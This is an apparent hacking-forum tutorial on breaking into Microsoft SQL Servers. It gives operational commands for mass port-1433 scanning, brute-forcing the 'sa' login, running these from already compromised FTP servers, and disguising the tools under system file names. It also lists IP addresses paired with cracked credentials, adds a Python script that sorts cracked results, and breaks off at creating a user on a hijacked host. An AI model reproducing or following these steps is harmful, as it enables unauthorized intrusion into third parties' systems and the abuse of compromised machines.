I originally wrote this tutorial for h4ck-y0u, but I don't want to keep it from you.

Hi,
some guys PM'ed me asking for a good basic tutorial on SQL Server hacking without any "injection"!


So here it is :

Chapter 0: Basics
Chapter 1: Find vulnerable servers
Chapter 2: Brute-force the vulnerable servers
Chapter 3: Check the results
Chapter 4: Hack the servers
Chapter 5: Break security rules


Tools used: Modded DFind, Modded SQLck, Modded mexP, mssqlchecker.exe, Modded fPort, hidden32, Modded KillZ, Serv-U UD, (RATmin), Modded SQLexec III, 1.013, Simple SQL Browser, Bulletproof FTP Server, Pumpkin TFTP, FlashFXP, Auto-Hacker by Z3r00l / dermoeter

All these tools are in a link above this tutorial! Please don't share them too much... keep them within the h4ck-y0u base!




Chapter 0:

First some basics of MSSQL hacking. A default SQL Server instance listens on TCP port 1433. The built-in administrative login is "sa" (it is a member of the sysadmin role, so it can do anything on the instance).
There are thousands of clueless admins out there who leave the "sa" password blank or set it to "12345", "sa", etc.
The advantage of hacking MSSQL is that a sysadmin login can run operating-system commands on the database host (the SQLexec tool used below does this through the server's xp_cmdshell extended stored procedure), so you can use all the cmd commands you already know: net stop, net start, net user, etc.
Let's start:





Chapter 1:

Find vulnerable servers - Okay guys, let's start. First we need some IPs with MSSQL running. MSSQL listens on port 1433.
Extract the tool DFind.exe, or if you have a remote server with full rights use dfindold.exe, because it is usually undetected (UD) by antivirus.
Then you have to choose an IP range you want to scan for MSSQL. But PLEASE do a whois on a few IPs first. Don't scan honeypots or ranges in your own country! I use http://www.iks-jena.de/cgi-bin/whois.pl to whois an IP with the country in the result.
If you are interested in a specific country, use http://www.ipaddresslocation.org/ip_...get_ranges.php to show which ranges belong to that country. Now back to the real work.

Example 1 - Scan on local Computer.

When you have extracted DFind.exe to your local PC, cd into its directory:
cmd.exe > cd c:\scanner\dfind\ (example)
Then run DFind.exe with these parameters:

DFind.exe -p 1433 startrange endrange (example: 207.261.0.0 207.280.255.254)

Note that the example range as written is not a valid IPv4 range: every octet must be between 0 and 255, so treat it as a placeholder and substitute a real start and end address.

Afterwards there is a text file called dfind.txt containing all the IPs found with an open port 1433.
Wait a day, or just a few hours, depending on the range size.

Example 2 - scan on a remote Stro/Server

A compromised server that also runs an FXP-capable FTP server is called a "Stro" (the term comes from the FXP scene). That FTP server lets you upload and run arbitrary win32 binaries (via SITE EXEC). A remote server with Remote Desktop or full rights can also be used, but your hoster will kick you within a few hours ^^.
Just upload hidden32.exe and dfind.exe to your remote box and change into that directory.
Depending on the type of remote server, use one of these commands:

FXP server: site exec hidden32.exe dfind.exe -p 1433 rangestart rangeend (example: 207.261.0.0 207.280.255.254; as above, this is a placeholder, not a valid IPv4 range)
Ordinary remote server ("0815-Remote"): dfind.exe -p 1433 rangestart rangeend (same example)

You will find dfind.txt in the same directory as your .exe.
Wait a day, or just a few hours, depending on the range size.


There are a few other command-line SQL scanners (sql 100/500/1000, sqllhf, and so on); I hate them all!



Chapter 2:

Brute-force the results listed in dfind.txt

Example 1 - Brute on local Computer.

Extract the tools from /modded Bruter/, including SQLck.exe. Copy dfind.txt into the same directory! There are other options, but this works 100%. SQLck.exe is a password auditing tool, also called a bruter. Because we are only brute-forcing "sa" in my examples, you only need a pw.txt password file. My pack contains two different ones: a "small" version and a 15 MB version. Use the small one first; the easily cracked servers use weak passwords that the small list already covers, so the big list is only needed for the harder ones.
Then run SQLck.exe with these parameters:

SQLck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

-p = password file
-i = scan result file (input)
-o = output file
-t = threads

Increase the -t value depending on your connection.
Now let it crack. If result.txt grows, consider yourself lucky: some SQL servers have been cracked.

It's possible that you don't have enough RAM to run SQLck.exe.
In that case read Example 3!
I have over 100 hacked Stros. The cracking power is unbelievable!
My Intel Xeon 3800 with 8 GB RAM on a fiber-optic connection needs more than 3 days to crack a 1 MB dfind file with 1000 threads! So don't be worried if there are not too many results in the first hours.



Example 2 - Brute on remote Stro/Server.

Same procedure as in Chapter 1, Example 2.

Upload SQLck.exe from /modded Bruter/, hidden32.exe and PW.txt to your server. Copy dfind.txt into the SQLck.exe directory!
Depending on the type of remote server, use one of these commands:


FXP server: site exec hidden32.exe SQLck.exe -p PW.txt -i dfind.txt -o result.txt -t 200
Ordinary remote server ("0815-Remote"): SQLck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

If the server appears to hang, don't worry; it's just a long startup lag.


Example 3 - When SQLck.exe hangs.

Okay, then change into your /modded Bruter/ directory.
The same tool is also shipped there under innocuous, system-looking file names. Legend (original name -> renamed copy):

SQLck.exe -> rundll32.dll
password.txt -> mspoolservice.dll
SQLck_Logfile.txt -> Systemservice.ocx
result.txt -> winlogon.dll
hidden.exe -> system32.dll

The renamed files are still ordinary executables and text files; only the names differ, so the parameters are the same as above. The additional -r option selects the login to test (here sa).

Usage 1 (local): rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200
Usage 2 (FXP server): site exec system32.dll rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 99999

This tool is not modded by me! The respect goes to the real author, please!





Chapter 3 - Check the Results



Yeah, now let's check the brute-force results!
Open your result.txt or winlogon.dll (open it with Notepad).

This could be a result:

202.76.235.51:1433 [sa:123456] Time:422 msec
202.80.173.17:1433 [sa:sa] Time:313 msec
202.75.223.141:1433 [sa:!@#$%^&*()] Time:453 msec
202.82.116.202:1433 [sa:sa] Time:328 msec
202.83.41.166:1433 [sa:] Time:360 msec
202.82.39.244:1433 [sa:password] Time:313 msec
202.85.51.12:1433 [sa:password] Time:312 msec <---- lowest time / fastest server
202.85.169.95:1433 [sa:123] Time:344 msec
202.86.128.229:1433 [sa:] Time:672 msec
202.87.47.27:1433 [sa:] Time:3250 msec
202.88.128.108:1433 [sa:] Time:1593 msec
202.88.128.190:1433 [sa:] Time:640 msec


Each line shows IP:port, [user:password] and the response time. Check the IPs with the lowest response time first; they are the most responsive servers (note that an empty password shows up as "[sa:]").
Now open sqlexec2.exe and just click "later" on the startup dialog.
Enter the IP in the Host field, then enter the username and password and click Connect.
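Sorting a long result file by hand is tedious, so here is a small parser for the result-line format shown above, as an added example (it is not part of the original post and not code from the SQLck tool). It assumes only the line shape visible above, "ip:port [login:password] Time:N msec", tolerates an empty password and one containing "]"-free special characters, ignores trailing annotations such as the arrow comment, sorts by response time, and flags trivially weak passwords. The embedded sample is the result listing from this chapter; the small list of trivial passwords is my own assumption.

```python
"""Parse SQLck-style result lines, sort by response time, flag weak passwords.

Added example for this tutorial; not the SQLck tool's own code.
"""
import re
from dataclasses import dataclass

# One result line: "ip:port [login:password] Time:N msec".  The password may be
# empty or contain arbitrary characters such as "!@#$%^&*()", so it is matched
# greedily up to the closing "] Time:".  Nothing is anchored after "msec", so a
# trailing note like "<---- lowest time" is ignored.
LINE_RE = re.compile(
    r"^(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"\[(?P<login>[^:\]]+):(?P<password>.*)\]\s+Time:(?P<ms>\d+)\s+msec"
)

# Assumed list of trivial passwords (not from the original post).
TRIVIAL_PASSWORDS = {"", "password", "123", "1234", "12345", "123456"}


@dataclass(frozen=True)
class Result:
    host: str
    port: int
    login: str
    password: str
    response_ms: int


def parse_line(line: str):
    """Return a Result for one line, or None if the line is not a result line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Result(m["host"], int(m["port"]), m["login"], m["password"], int(m["ms"]))


def parse_results(text: str) -> list:
    """Parse a whole result file, skipping blank or unparseable lines."""
    return [r for r in (parse_line(ln) for ln in text.splitlines()) if r is not None]


def sort_by_response_time(results) -> list:
    """Fastest-responding servers first, as the tutorial recommends checking them."""
    return sorted(results, key=lambda r: r.response_ms)


def is_weak(r: Result) -> bool:
    """Blank password, password equal to the login name, or a trivial password."""
    pw = r.password.lower()
    return pw == r.login.lower() or pw in TRIVIAL_PASSWORDS


def weak_results(results) -> list:
    return [r for r in results if is_weak(r)]


# Sample input: the result listing from this chapter (constructed for the example).
SAMPLE = """\
202.76.235.51:1433 [sa:123456] Time:422 msec
202.80.173.17:1433 [sa:sa] Time:313 msec
202.75.223.141:1433 [sa:!@#$%^&*()] Time:453 msec
202.82.116.202:1433 [sa:sa] Time:328 msec
202.83.41.166:1433 [sa:] Time:360 msec
202.82.39.244:1433 [sa:password] Time:313 msec
202.85.51.12:1433 [sa:password] Time:312 msec <---- lowest time / fastest server
202.85.169.95:1433 [sa:123] Time:344 msec
202.86.128.229:1433 [sa:] Time:672 msec
202.87.47.27:1433 [sa:] Time:3250 msec
202.88.128.108:1433 [sa:] Time:1593 msec
202.88.128.190:1433 [sa:] Time:640 msec
"""

if __name__ == "__main__":
    results = parse_results(SAMPLE)
    for r in sort_by_response_time(results):
        flag = "WEAK" if is_weak(r) else "    "
        print(f"{flag} {r.host}:{r.port} {r.login}:{r.password!r} {r.response_ms} ms")
```

Running the script prints the twelve entries fastest first, with every line except the one using "!@#$%^&*()" flagged as weak; the same parser works on a winlogon.dll output file, since it is the same text format under a different name.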

A successful connection looks like this:
SQL>Connecting 202.97.181.61.
SQL>Connected to 202.97.181.61.

A failed connection looks like this:
SQL>Connecting 202.97.181.61.
SQL>Could not connect to 202.97.181.61.
SQL>Disconnected.

This can happen because of a mistyped password, or because the server's password was changed after the brute-force run =(

On a working connection, type in the command line: dir c:\

The command runs on the database host, and there are different possible results.

The good one is a listing of the files and folders on the server.
All the other results are explained in Chapter 5!



Chapter 4 - Hack the Servers

Now the interesting part. Once you have a cracked server that returns a file and folder listing, FIRST run this on your own PC:

Example 1 - Check for a Remote Desktop connection

Run > mstsc.exe
Type in the SAME IP as your SQL server.
If you can connect and see the remote desktop... damn, you're in!
Create your own user:

P.S. YES, the copyright is mine! dermoeter aka Z3r0c00l

Anyone who really wants to get into this can get the Rapidshare link for the remaining programs by PM.